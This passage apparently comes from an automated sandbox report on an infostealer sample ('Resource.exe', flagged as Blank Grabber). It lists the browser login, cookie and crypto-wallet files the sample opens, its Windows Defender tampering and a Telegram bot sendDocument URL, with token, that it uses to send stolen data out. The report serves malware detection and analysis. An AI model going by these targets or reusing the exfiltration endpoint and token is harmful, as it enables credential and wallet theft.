              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-releaseJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashesJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldbJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: Yara matchFile source: 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Resource.exe PID: 6048, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000001.00000003.2030787005.0000020AB3901000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2019140558.00000203A2F47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2473117545.0000020AB3C0B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2019140558.00000203A2F49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.2467713655.0000020AB46E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Resource.exe PID: 6632, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Resource.exe PID: 6048, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI66322\rarreg.key, type: DROPPED
              Source: Yara matchFile source: Process Memory Space: Resource.exe PID: 6048, type: MEMORYSTR
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8B7E545E8 bind,1_2_00007FF8B7E545E8
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8B7E555FC listen,1_2_00007FF8B7E555FC
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts241
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              File and Directory Permissions Modification
              1
              OS Credential Dumping
              2
              System Time Discovery
              Remote Services1
              Archive Collected Data
              1
              Web Service
              Exfiltration Over Other Network Medium1
              Data Encrypted for Impact
              CredentialsDomainsDefault Accounts2
              Native API
              2
              Registry Run Keys / Startup Folder
              1
              Access Token Manipulation
              3
              Disable or Modify Tools
              LSASS Memory2
              File and Directory Discovery
              Remote Desktop Protocol3
              Data from Local System
              2
              Ingress Tool Transfer
              Exfiltration Over Bluetooth1
              System Shutdown/Reboot
              Email AddressesDNS ServerDomain Accounts222
              Command and Scripting Interpreter
              Logon Script (Windows)11
              Process Injection
              11
              Deobfuscate/Decode Files or Information
              Security Account Manager49
              System Information Discovery
              SMB/Windows Admin Shares1
              Email Collection
              21
              Encrypted Channel
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts3
              PowerShell
              Login Hook2
              Registry Run Keys / Startup Folder
              21
              Obfuscated Files or Information
              NTDS251
              Security Software Discovery
              Distributed Component Object Model1
              Clipboard Data
              3
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              Software Packing
              LSA Secrets2
              Process Discovery
              SSHKeylogging4
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials141
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              File Deletion
              DCSync1
              Application Window Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Modify Registry
              Proc Filesystem11
              Remote System Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt141
              Virtualization/Sandbox Evasion
              /etc/passwd and /etc/shadow11
              System Network Configuration Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
              Access Token Manipulation
              Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd11
              Process Injection
              Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1584846 Sample: Resource.exe Startdate: 06/01/2025 Architecture: WINDOWS Score: 100 67 api.telegram.org 2->67 69 blank-63z6o.in 2->69 71 ip-api.com 2->71 85 Suricata IDS alerts for network traffic 2->85 87 Multi AV Scanner detection for submitted file 2->87 89 Yara detected Blank Grabber 2->89 93 13 other signatures 2->93 11 Resource.exe 22 2->11         started        signatures3 91 Uses the Telegram API (likely for C&C communication) 67->91 process4 file5 55 C:\Users\user\AppData\Local\Temp\...\rar.exe, PE32+ 11->55 dropped 57 C:\Users\user\AppData\Local\...\rarreg.key, ASCII 11->57 dropped 59 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 11->59 dropped 61 16 other files (none is malicious) 11->61 dropped 111 Self deletion via cmd or bat file 11->111 113 Modifies Windows Defender protection settings 11->113 115 Adds a directory exclusion to Windows Defender 11->115 117 2 other signatures 11->117 15 Resource.exe 106 11->15         started        signatures6 process7 dnsIp8 73 ip-api.com 208.95.112.1, 49709, 49849, 80 TUT-ASUS United States 15->73 75 api.telegram.org 149.154.167.220, 443, 49853 TELEGRAMRU United Kingdom 15->75 77 Found many strings related to Crypto-Wallets (likely being stolen) 15->77 79 Uses cmd line tools excessively to alter registry or file data 15->79 81 Self deletion via cmd or bat file 15->81 83 7 other signatures 15->83 19 cmd.exe 1 15->19         started        22 cmd.exe 1 15->22         started        24 cmd.exe 15->24         started        26 36 other processes 15->26 signatures9 process10 signatures11 95 Suspicious powershell command line found 19->95 97 Uses ping.exe to sleep 19->97 99 Uses cmd line tools excessively to alter registry or file data 19->99 109 3 other signatures 19->109 28 powershell.exe 23 19->28         started        31 conhost.exe 19->31         started        101 Modifies Windows Defender protection settings 22->101 103 Removes signatures from Windows Defender 22->103 33 powershell.exe 23 22->33         started        43 2 other processes 22->43 105 Adds a directory exclusion to Windows Defender 24->105 35 powershell.exe 24->35         started        37 conhost.exe 24->37         started        107 Encrypted powershell cmdline option found 26->107 39 getmac.exe 26->39         started        41 systeminfo.exe 26->41         started        45 70 other processes 26->45 process12 file13 119 Loading BitLocker PowerShell Module 33->119 121 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 39->121 123 Writes or reads registry keys via WMI 39->123 63 C:\Users\user\AppData\Local\Temp\rEC04.zip, RAR 45->63 dropped 65 C:\Users\user\AppData\...\erdw4v5g.cmdline, Unicode 45->65 dropped 48 csc.exe 45->48         started        signatures14 process15 file16 53 C:\Users\user\AppData\Local\...\erdw4v5g.dll, PE32 48->53 dropped 51 cvtres.exe 48->51         started        process17

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              Resource.exe72%VirustotalBrowse
              Resource.exe66%ReversingLabsWin64.Trojan.Znyonm
              Resource.exe100%Joe Sandbox ML
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\_MEI66322\VCRUNTIME140.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI66322\_bz2.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI66322\_ctypes.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI66322\_decimal.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI66322\_hashlib.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI66322\_lzma.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI66322\_queue.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI66322\_socket.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI66322\_sqlite3.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI66322\_ssl.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI66322\libcrypto-3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI66322\libffi-8.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI66322\libssl-3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI66322\python311.dll4%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI66322\select.pyd4%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI66322\sqlite3.dll4%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI66322\unicodedata.pyd4%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://www.microsoftZXCVBN~1DB-y.0%Avira URL Cloudsafe
              http://www.microsoftOWNLO~1.TXTy.0%Avira URL Cloudsafe
              http://www.microsoft100~1.5.PBy.0%Avira URL Cloudsafe
              http://www.microsoft00~1.5.JSOy.0%Avira URL Cloudsafe
              https://api.anonfiles.com/uploadr0%Avira URL Cloudsafe
              https://en.wikipedi0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              ip-api.com
              208.95.112.1
              truefalse
                high
                api.telegram.org
                149.154.167.220
                truefalse
                  high
                  blank-63z6o.in
                  unknown
                  unknowntrue
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    https://api.telegram.org/bot6723507541:AAFus4a_vfOH23XVGo8SFLxAeDedGw1G3vk/sendDocumentfalse
                      high
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://github.com/Blank-c/BlankOBFResource.exe, 00000001.00000003.2030164549.0000020AB38C8000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2030015652.0000020AB38EC000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2030430138.0000020AB392B000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2030064983.0000020AB388D000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2029783273.0000020AB3EC2000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://www.avito.ru/Resource.exe, 00000001.00000002.2475663980.0000020AB4088000.00000004.00001000.00020000.00000000.sdmpfalse
                          high
                          https://api.telegram.org/botResource.exe, 00000001.00000003.2030787005.0000020AB3901000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmpfalse
                            high
                            https://github.com/Blank-c/Blank-GrabberiResource.exe, 00000001.00000003.2030787005.0000020AB3901000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://www.micom/pkiops/Docs/ry.htm0powershell.exe, 0000000E.00000002.2278599707.000001CEDBD4F000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://github.com/Blank-c/Blank-GrabberrResource.exe, 00000001.00000003.2030787005.0000020AB3901000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#Resource.exe, 00000001.00000002.2471811122.0000020AB18C4000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2024037750.0000020AB1913000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2023560970.0000020AB192B000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://www.leboncoin.fr/Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmpfalse
                                      high
                                      https://tools.ietf.org/html/rfc2388#section-4.4Resource.exe, 00000001.00000002.2472335398.0000020AB36AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64Resource.exe, 00000001.00000003.2033270433.0000020AB37F2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2472629307.0000020AB37DE000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2035529511.0000020AB37E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://weibo.com/Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2476060853.0000020AB4270000.00000004.00001000.00020000.00000000.sdmpfalse
                                            high
                                            https://api.anonfiles.com/uploadResource.exe, 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                              high
                                              https://www.msn.comResource.exe, 00000001.00000002.2477629542.0000020AB4FAC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                high
                                                https://nuget.org/nuget.exepowershell.exe, 0000000E.00000002.2266669419.000001CED38F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.2259141089.000001B7D6EED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.2342371224.000001B7E573D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.2342371224.000001B7E55FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://discord.com/api/v9/users/Resource.exe, 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    high
                                                    https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963Resource.exe, 00000001.00000002.2475527189.0000020AB3EC0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      high
                                                      http://cacerts.digiResource.exe, 00000000.00000003.2017977905.00000203A2F44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://peps.python.org/pep-0205/Resource.exe, 00000001.00000002.2472518311.0000020AB36C0000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.drfalse
                                                          high
                                                          https://www.reddit.com/Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000E.00000002.2197740500.000001CEC3881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.2259141089.000001B7D5581000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://en.wikipediResource.exe, 00000001.00000003.2024701640.0000020AB381C000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2029000040.0000020AB381C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://www.amazon.ca/Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.microsoftZXCVBN~1DB-y.Resource.exe, 00000001.00000003.2182066365.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2143553843.0000020AB3CE2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2198157815.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxyResource.exe, 00000001.00000002.2475852502.0000020AB40C0000.00000004.00001000.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2143553843.0000020AB3CE2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2176084487.0000020AB3D2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688Resource.exe, 00000001.00000002.2472003336.0000020AB3168000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000044.00000002.2259141089.000001B7D57AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000E.00000002.2197740500.000001CEC3AAA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000044.00000002.2259141089.000001B7D57AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://go.micropowershell.exe, 00000044.00000002.2259141089.000001B7D67F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerResource.exe, 00000001.00000002.2471811122.0000020AB18C4000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2024037750.0000020AB1913000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2023560970.0000020AB192B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.amazon.com/Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://github.com/python/cpython/issues/86361.Resource.exe, 00000001.00000003.2033438155.0000020AB3883000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2472335398.0000020AB3636000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2033114916.0000020AB3CBC000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2033504916.0000020AB3CBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://contoso.com/Iconpowershell.exe, 00000044.00000002.2342371224.000001B7E55FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://httpbin.org/Resource.exe, 00000001.00000003.2262114078.0000020AB3D2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sResource.exe, 00000000.00000003.2018935151.00000203A2F44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://www.cl.cam.ac.uk/~mgk25/iso-time.htmlResource.exe, 00000001.00000003.2032559881.0000020AB394B000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2032855046.0000020AB394B000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2031427069.0000020AB3864000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2031427069.0000020AB394B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brResource.exe, 00000001.00000003.2156478415.0000020AB46A7000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2161281040.0000020AB46D2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2163975768.0000020AB46D2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2153816176.0000020AB3BFE000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2190168428.0000020AB3BFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://allegro.pl/Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://github.com/Pester/Pesterpowershell.exe, 00000044.00000002.2259141089.000001B7D57AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535Resource.exe, 00000001.00000002.2472629307.0000020AB37DE000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2472335398.0000020AB3636000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_syResource.exe, 00000001.00000002.2471811122.0000020AB18C4000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2024037750.0000020AB1913000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2023560970.0000020AB192B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://MD8.mozilla.org/1/mResource.exe, 00000001.00000003.2360929970.0000020AB47BA000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2205878951.0000020AB47BA000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2476060853.0000020AB42AC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://www.python.org/psf/license/Resource.exe, Resource.exe, 00000001.00000002.2483357030.00007FF8A8D68000.00000040.00000001.01000000.00000004.sdmpfalse
                                                                                                        high
                                                                                                        https://www.bbc.co.uk/Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://bugzilla.moResource.exe, 00000001.00000002.2476060853.0000020AB41C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://api.anonfiles.com/uploadrResource.exe, 00000001.00000003.2030787005.0000020AB3901000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://tools.ietf.org/html/rfc6125#section-6.4.3Resource.exe, 00000001.00000002.2475852502.0000020AB419C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://www.microsoft100~1.5.PBy.Resource.exe, 00000001.00000003.2245183110.0000020AB3CDC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              http://www.microsoft00~1.5.JSOy.Resource.exe, 00000001.00000003.2470045759.0000020AB3D05000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2263382066.0000020AB3D05000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2263201578.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2469860904.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000E.00000002.2197740500.000001CEC3AAA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBLResource.exe, 00000001.00000003.2190168428.0000020AB3BFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://google.com/mailResource.exe, 00000001.00000003.2469239519.0000020AB3D2F000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473117545.0000020AB3CBC000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2363232730.0000020AB3D2A000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2162875077.0000020AB3CBC000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2208655261.0000020AB3D31000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2143553843.0000020AB3CE2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2182427502.0000020AB3CBC000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2176084487.0000020AB3D2A000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473991715.0000020AB3D31000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2198157815.0000020AB3D31000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2262114078.0000020AB3D2A000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2153816176.0000020AB3CBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pyResource.exe, 00000001.00000003.2023560970.0000020AB192B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.phys.uu.nl/~vgent/calendar/isocalendar.htmResource.exe, 00000001.00000003.2032559881.0000020AB394B000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2032855046.0000020AB394B000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2031427069.0000020AB3864000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2031427069.0000020AB394B000.00000004.00000020.00020000.00000000.sdmpfalse
